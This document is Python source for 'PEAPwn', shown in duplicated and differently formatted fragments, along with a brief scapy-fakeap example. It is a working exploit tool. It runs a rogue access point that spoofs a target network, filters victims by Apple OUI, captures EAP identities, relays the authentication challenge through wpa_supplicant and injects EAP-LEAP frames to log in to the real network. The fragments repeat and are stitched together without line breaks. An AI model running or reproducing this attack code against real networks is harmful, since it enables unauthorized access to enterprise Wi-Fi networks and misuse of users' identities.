def run(self): # Check root check_root() # Pi warning if RUNNING_ON_PI: debug_print(clr(Color.MAGENTA, "*** RUNNING ON PI ***"), Level.CRITICAL) # Setup interface self.monitor_dev = set_monitor_mode(args['mon_if']) self.mon_mac = get_if_hwaddr(args['mon_if']) self.infra_mac = get_if_hwaddr(args['infra_if']) conf.logLevel = 0 # Do not let scapy log anything conf.iface = self.monitor_dev # Create our rogue AP self.ap = FakeAccessPoint(self.monitor_dev, 1, self.mon_mac, '1', True) self.ap.addSSID(self.target_essid) debug_print("[+] Spoofing %s." % (self.target_essid), Level.INFO) # Start sniffing sniff( iface=self.monitor_dev, prn=self.sniff_callback, store=0, filter="(ether dst host " + self.mon_mac + " or ether dst host " + self.infra_mac + ") or wlan type mgt and (ether dst host ff:ff:ff:ff:ff:ff or ether dst host " + self.mon_mac + ")")
def run(self): # Check root check_root() # Pi warning if RUNNING_ON_PI: debug_print(clr(Color.MAGENTA, "*** RUNNING ON PI ***"), Level.CRITICAL) # Setup interface self.monitor_dev = set_monitor_mode(args["mon_if"]) self.mon_mac = get_if_hwaddr(args["mon_if"]) self.infra_mac = get_if_hwaddr(args["infra_if"]) conf.logLevel = 0 # Do not let scapy log anything conf.iface = self.monitor_dev # Create our rogue AP self.ap = FakeAccessPoint(self.monitor_dev, 1, self.mon_mac, "1", True) self.ap.addSSID(self.target_essid) debug_print("[+] Spoofing %s." % (self.target_essid), Level.INFO) # Start sniffing sniff( iface=self.monitor_dev, prn=self.sniff_callback, store=0, filter="(ether dst host " + self.mon_mac + " or ether dst host " + self.infra_mac + ") or wlan type mgt and (ether dst host ff:ff:ff:ff:ff:ff or ether dst host " + self.mon_mac + ")", )
# This example is a simple 'hello world' for scapy-fakeap. # An open network will be created that can be joined by 802.11 enabled devices. # The AP configuration is specified in 'example.conf'. from fakeap import FakeAccessPoint ap = FakeAccessPoint.from_file('example.conf') ap.run()
class PEAPwn(): def __init__(self): self.mon_mac = None self.infra_mac = None self.monitor_dev = None self.state = State.CATCH self.identity = "" self.identity_mac = None self.target_essid = args['essid'] self.ap = None self.challenge = "nothing!" self.response = None self.print_count = 0 self.exploiter = None self.dom_sock = ChallengeDomSock() self.wpa_proc = None self.error_message = "unknown" def write_config(self): global wpa_supplicant_conf fileHandler = open('peapwn.conf', 'w') wpa_supplicant_conf = wpa_supplicant_conf.replace( "${identity}", self.identity) wpa_supplicant_conf = wpa_supplicant_conf.replace( "${essid}", self.target_essid) fileHandler.write(wpa_supplicant_conf) fileHandler.close() def start_wpa_supplicant(self): # Write configuration for wpa_supplicant self.write_config() # Start wpa_supplicant debug = "" cur_stdout = subprocess.PIPE cur_stderr = subprocess.PIPE if (args['debug']): debug = "-ddd" cur_stdout = sys.stdout cur_stderr = sys.stderr self.wpa_proc = subprocess.Popen([ '../mods/hostap/wpa_supplicant/wpa_supplicant', '-Dwext', '-i' + args['infra_if'], '-c./peapwn.conf', '-K', debug ], stdout=cur_stdout, stderr=cur_stderr, close_fds=True) def is_vulnerable(self, source_mac): source_oui = source_mac[0:8].upper() result = (source_oui in apple_oui) if not result: debug_print( clr( Color.GREY, "[*] Caught " + source_mac + ", but this device is not vulnerable."), Level.INFO) return result def sniff_callback(self, packet): global args try: # Spoof stage if self.state == State.CATCH: if packet.type == 0x00: # Management if packet.subtype == 4: # Probe request ssid = packet[Dot11Elt].info debug_print( "Probe request for SSID %s by MAC %s" % (ssid, packet.addr2), Level.DEBUG) if ssid == self.target_essid or ( Dot11Elt in packet and packet[Dot11Elt].len == 0): self.ap.injectProbeResponse( packet.addr2, self.target_essid) elif packet.subtype == 0x0B: # Authentication if packet.addr1 == self.mon_mac: # We are the receivers if args['nooui']: self.ap.sc = -1 # Reset sequence number self.ap.injectAuthSuccess(packet.addr2) else: if self.is_vulnerable(packet.addr2): self.ap.sc = -1 self.ap.injectAuthSuccess(packet.addr2) elif (packet.subtype == 0x00 or packet.subtype == 0x02): # Association if packet.addr1 == self.mon_mac: # We are the receivers self.ap.injectAssociationSuccess( packet.addr2, packet.subtype) self.ap.injectEAPPacket(packet.addr2, EAPCode.REQUEST, EAPType.IDENTITY, None) self.state = State.IDENTITYCAP debug_print("[+] Waiting for identity response.", Level.INFO) self.timer = Timer( 10, self, "device failed to answer identity request") self.timer.start() # Capture identity stage if self.state == State.IDENTITYCAP: if packet.type == 0x02 and packet.addr1 == self.mon_mac: # Data frames if EAP in packet: if packet[EAP].code == EAPCode.RESPONSE: # Responses if packet[EAP].type == EAPType.IDENTITY: raw_identity = str(packet[Raw]) if packet.addr1 == self.mon_mac: self.identity = raw_identity[ 0:len(raw_identity) - 4] # EAP Identity Response debug_print( clr( Color.GREEN, "[+] Caught identity: '" + self.identity + "'. Starting wpa_supplicant."), Level.INFO) self.timer.restart( 20, "wpa_supplicant failed to get challenge from AP. Make sure client certificates are disabled" ) self.identity_mac = packet.addr2 self.start_wpa_supplicant() self.state = State.CHALLENGECAP if EAPOL in packet: # Client did not see our initial identity request. Send it again! if packet[EAPOL].type == 0x01: self.ap.injectEAPPacket(packet.addr2, EAPCode.REQUEST, EAPType.IDENTITY, None) # Wait for challenge from wpa_supplicant if self.state == State.CHALLENGECAP: self.challenge = self.dom_sock.wait() # Start our exploit self.timer.restart( 20, "failed to get challenge response from target. Make sure the device is vulnerable" ) self.exploiter = Exploiter(self.ap, self.identity_mac, self.identity, self) self.exploiter.start() self.state = State.RESPONSECAP # Wait for challenge response from device if self.state == State.RESPONSECAP: if packet.type == 0x02: if packet.addr2 == self.identity_mac and packet.addr1 == self.mon_mac: if EAP in packet: if packet[EAP].type == EAPType.EAP_LEAP: raw_data = str(packet[Raw]) self.response = raw_data[3:27] if self.dom_sock.submit(self.response): if len(self.response) == 24: self.state = State.COMPLETE else: self.state = State.FAIL self.error_message = "expected 24-byte challenge response, but got '%s'" % self.response if self.state == State.COMPLETE: debug_print( clr( Color.GREEN, "[+] Attack successful. Run dhcpcd to get an IP address now." ), Level.INFO) self.destroy() if self.state == State.FAIL: debug_print( clr( Color.RED, "[-] Attack failed. Reason: %s. Retrying." % self.error_message), Level.CRITICAL) if self.wpa_proc: self.wpa_proc.kill() if self.timer: self.timer.stop = True if self.exploiter: self.exploiter.stop = True self.state = State.CATCH debug_print("[+] Spoofing %s." % (self.target_essid), Level.INFO) except Exception as err: debug_print(clr(Color.RED, "[-] Unknown error: %s" % repr(err)), Level.CRITICAL) def destroy(self): self.timer.stop = True self.exploiter.stop = True set_monitor_mode(self.monitor_dev, False) exit() def run(self): # Check root check_root() # Pi warning if RUNNING_ON_PI: debug_print(clr(Color.MAGENTA, "*** RUNNING ON PI ***"), Level.CRITICAL) # Setup interface self.monitor_dev = set_monitor_mode(args['mon_if']) self.mon_mac = get_if_hwaddr(args['mon_if']) self.infra_mac = get_if_hwaddr(args['infra_if']) conf.logLevel = 0 # Do not let scapy log anything conf.iface = self.monitor_dev # Create our rogue AP self.ap = FakeAccessPoint(self.monitor_dev, 1, self.mon_mac, '1', True) self.ap.addSSID(self.target_essid) debug_print("[+] Spoofing %s." % (self.target_essid), Level.INFO) # Start sniffing sniff( iface=self.monitor_dev, prn=self.sniff_callback, store=0, filter="(ether dst host " + self.mon_mac + " or ether dst host " + self.infra_mac + ") or wlan type mgt and (ether dst host ff:ff:ff:ff:ff:ff or ether dst host " + self.mon_mac + ")")
class PEAPwn: def __init__(self): self.mon_mac = None self.infra_mac = None self.monitor_dev = None self.state = State.CATCH self.identity = "" self.identity_mac = None self.target_essid = args["essid"] self.ap = None self.challenge = "nothing!" self.response = None self.print_count = 0 self.exploiter = None self.dom_sock = ChallengeDomSock() self.wpa_proc = None self.error_message = "unknown" def write_config(self): global wpa_supplicant_conf fileHandler = open("peapwn.conf", "w") wpa_supplicant_conf = wpa_supplicant_conf.replace("${identity}", self.identity) wpa_supplicant_conf = wpa_supplicant_conf.replace("${essid}", self.target_essid) fileHandler.write(wpa_supplicant_conf) fileHandler.close() def start_wpa_supplicant(self): # Write configuration for wpa_supplicant self.write_config() # Start wpa_supplicant debug = "" cur_stdout = subprocess.PIPE cur_stderr = subprocess.PIPE if args["debug"]: debug = "-ddd" cur_stdout = sys.stdout cur_stderr = sys.stderr self.wpa_proc = subprocess.Popen( [ "../mods/hostap/wpa_supplicant/wpa_supplicant", "-Dwext", "-i" + args["infra_if"], "-c./peapwn.conf", "-K", debug, ], stdout=cur_stdout, stderr=cur_stderr, close_fds=True, ) def is_vulnerable(self, source_mac): source_oui = source_mac[0:8].upper() result = source_oui in apple_oui if not result: debug_print( clr(Color.GREY, "[*] Caught " + source_mac + ", but this device is not vulnerable."), Level.INFO ) return result def sniff_callback(self, packet): global args try: # Spoof stage if self.state == State.CATCH: if packet.type == 0x00: # Management if packet.subtype == 4: # Probe request ssid = packet[Dot11Elt].info debug_print("Probe request for SSID %s by MAC %s" % (ssid, packet.addr2), Level.DEBUG) if ssid == self.target_essid or (Dot11Elt in packet and packet[Dot11Elt].len == 0): self.ap.injectProbeResponse(packet.addr2, self.target_essid) elif packet.subtype == 0x0B: # Authentication if packet.addr1 == self.mon_mac: # We are the receivers if args["nooui"]: self.ap.sc = -1 # Reset sequence number self.ap.injectAuthSuccess(packet.addr2) else: if self.is_vulnerable(packet.addr2): self.ap.sc = -1 self.ap.injectAuthSuccess(packet.addr2) elif packet.subtype == 0x00 or packet.subtype == 0x02: # Association if packet.addr1 == self.mon_mac: # We are the receivers self.ap.injectAssociationSuccess(packet.addr2, packet.subtype) self.ap.injectEAPPacket(packet.addr2, EAPCode.REQUEST, EAPType.IDENTITY, None) self.state = State.IDENTITYCAP debug_print("[+] Waiting for identity response.", Level.INFO) self.timer = Timer(10, self, "device failed to answer identity request") self.timer.start() # Capture identity stage if self.state == State.IDENTITYCAP: if packet.type == 0x02 and packet.addr1 == self.mon_mac: # Data frames if EAP in packet: if packet[EAP].code == EAPCode.RESPONSE: # Responses if packet[EAP].type == EAPType.IDENTITY: raw_identity = str(packet[Raw]) if packet.addr1 == self.mon_mac: self.identity = raw_identity[0 : len(raw_identity) - 4] # EAP Identity Response debug_print( clr( Color.GREEN, "[+] Caught identity: '" + self.identity + "'. Starting wpa_supplicant.", ), Level.INFO, ) self.timer.restart( 20, "wpa_supplicant failed to get challenge from AP. Make sure client certificates are disabled", ) self.identity_mac = packet.addr2 self.start_wpa_supplicant() self.state = State.CHALLENGECAP if EAPOL in packet: # Client did not see our initial identity request. Send it again! if packet[EAPOL].type == 0x01: self.ap.injectEAPPacket(packet.addr2, EAPCode.REQUEST, EAPType.IDENTITY, None) # Wait for challenge from wpa_supplicant if self.state == State.CHALLENGECAP: self.challenge = self.dom_sock.wait() # Start our exploit self.timer.restart( 20, "failed to get challenge response from target. Make sure the device is vulnerable" ) self.exploiter = Exploiter(self.ap, self.identity_mac, self.identity, self) self.exploiter.start() self.state = State.RESPONSECAP # Wait for challenge response from device if self.state == State.RESPONSECAP: if packet.type == 0x02: if packet.addr2 == self.identity_mac and packet.addr1 == self.mon_mac: if EAP in packet: if packet[EAP].type == EAPType.EAP_LEAP: raw_data = str(packet[Raw]) self.response = raw_data[3:27] if self.dom_sock.submit(self.response): if len(self.response) == 24: self.state = State.COMPLETE else: self.state = State.FAIL self.error_message = ( "expected 24-byte challenge response, but got '%s'" % self.response ) if self.state == State.COMPLETE: debug_print(clr(Color.GREEN, "[+] Attack successful. Run dhcpcd to get an IP address now."), Level.INFO) self.destroy() if self.state == State.FAIL: debug_print( clr(Color.RED, "[-] Attack failed. Reason: %s. Retrying." % self.error_message), Level.CRITICAL ) if self.wpa_proc: self.wpa_proc.kill() if self.timer: self.timer.stop = True if self.exploiter: self.exploiter.stop = True self.state = State.CATCH debug_print("[+] Spoofing %s." % (self.target_essid), Level.INFO) except Exception as err: debug_print(clr(Color.RED, "[-] Unknown error: %s" % repr(err)), Level.CRITICAL) def destroy(self): self.timer.stop = True self.exploiter.stop = True set_monitor_mode(self.monitor_dev, False) exit() def run(self): # Check root check_root() # Pi warning if RUNNING_ON_PI: debug_print(clr(Color.MAGENTA, "*** RUNNING ON PI ***"), Level.CRITICAL) # Setup interface self.monitor_dev = set_monitor_mode(args["mon_if"]) self.mon_mac = get_if_hwaddr(args["mon_if"]) self.infra_mac = get_if_hwaddr(args["infra_if"]) conf.logLevel = 0 # Do not let scapy log anything conf.iface = self.monitor_dev # Create our rogue AP self.ap = FakeAccessPoint(self.monitor_dev, 1, self.mon_mac, "1", True) self.ap.addSSID(self.target_essid) debug_print("[+] Spoofing %s." % (self.target_essid), Level.INFO) # Start sniffing sniff( iface=self.monitor_dev, prn=self.sniff_callback, store=0, filter="(ether dst host " + self.mon_mac + " or ether dst host " + self.infra_mac + ") or wlan type mgt and (ether dst host ff:ff:ff:ff:ff:ff or ether dst host " + self.mon_mac + ")", )